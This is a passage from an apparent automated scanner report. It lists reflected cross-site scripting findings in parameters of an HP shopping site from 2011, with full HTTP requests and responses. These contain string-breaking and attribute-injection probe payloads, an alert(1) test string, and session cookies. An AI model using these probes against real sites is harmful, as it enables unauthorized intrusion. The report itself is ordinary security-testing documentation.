jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA6e7d1"%3ba4830b19c2d&landing=desktops&category=p7xt_series&lanAttr=&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:29:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:29:37 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 250284


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...
lumnIndexArray = new Array();
var productArray = new Array();
var browserName=(navigator.appName != "Microsoft Internet Explorer")?"table-cell":"block";

var tempPCPProducts = "QP767AA#ABA|BV704AA#ABA6e7d1";a4830b19c2d"
var orgPCPProducts = tempPCPProducts.split("|");
function showProductOverlayDemo(arrayOfIDsShow,demoID,demoURL,hrefPos,overlaydemo,nonStaticDiv)
{
   if (typeof( arrayOfIDsShow.length) == 'undef
...[SNIP]...

1.30. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [lanAttr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The value of the lanAttr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58f0d"%20a%3db%20ab9279e704a was submitted in the lanAttr parameter. This input was echoed as 58f0d" a=b ab9279e704a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktops&category=p7xt_series&lanAttr=58f0d"%20a%3db%20ab9279e704a&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:30:02 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:30:01 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284712


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...
e" value="/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/product_comparison.do&lanAttr=58f0d" a=b ab9279e704a">
...[SNIP]...

1.31. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [landing parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The value of the landing request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3433"%3b47173d103a2 was submitted in the landing parameter. This input was echoed as a3433";47173d103a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktopsa3433"%3b47173d103a2&category=p7xt_series&lanAttr=&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:29:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:29:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284152


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...
op=100");
}

function windowOpenEmail()
{
var url = "https://www.shopping.hp.com/webapp/shopping/emailAFriendRequest.do?productList="+ escape(orgPCPProducts.join("|")) + "&source=pcp&landing=desktopsa3433";47173d103a2";
window.open(url , "newWindow", "scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0,width=800,height=650,left=200,top=100");
}

function windowChat()
{
var url = "http://ww
...[SNIP]...

1.32. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [subcat1 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The value of the subcat1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a71d"%20a%3db%208a778188a16 was submitted in the subcat1 parameter. This input was echoed as 5a71d" a=b 8a778188a16 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktops&category=p7xt_series&lanAttr=&subcat1=rts5a71d"%20a%3db%208a778188a16&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:30:10 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:30:10 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284373


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&&subcat1=rts5a71d" a=b 8a778188a16&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/product_comparison.do">
...[SNIP]...

1.33. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the &subcat1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1272f'%3bd8b7fc6fcc3 was submitted in the &subcat1 parameter. This input was echoed as 1272f';d8b7fc6fcc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&&subcat1=rts1272f'%3bd8b7fc6fcc3&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/product_comparison.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_comparison.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkoiNyT2w59Nijvv1PXcQyYmmvi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; hpcompc_usen=cartExists=true; EMID=; s_depth=29; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Acompare; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Acompare%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'0'%2526oidt%253D2%2526ot%253DBUTTON%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:30:40 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkiiN%2BV3gt6OintvFTXcgOe0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:30:41 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:30:41 GMT; path=/
